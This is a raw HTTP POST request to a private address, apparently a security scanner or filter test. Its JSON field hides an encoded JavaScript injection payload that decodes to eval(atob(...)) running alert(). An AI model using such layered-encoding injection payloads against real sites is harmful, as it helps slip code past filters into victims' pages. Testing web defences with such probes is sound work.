POST / HTTP/1.1
Host: 10.10.3.128:2280
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"test":true, "189a5a809e": "\u0065\u0076\u0061\u006c\u0025\u0032\u0038\u0061\u0074\u006f\u0062\u0025\u0032\u0038\u0025\u0032\u0037\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004b\u0051\u0025\u0033\u0044\u0025\u0033\u0044\u0025\u0032\u0037\u0025\u0032\u0039\u0025\u0032\u0039"}

